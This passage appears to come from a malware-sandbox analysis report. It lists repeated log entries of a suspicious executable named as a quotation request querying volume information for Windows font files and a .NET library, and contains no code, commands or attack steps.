                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
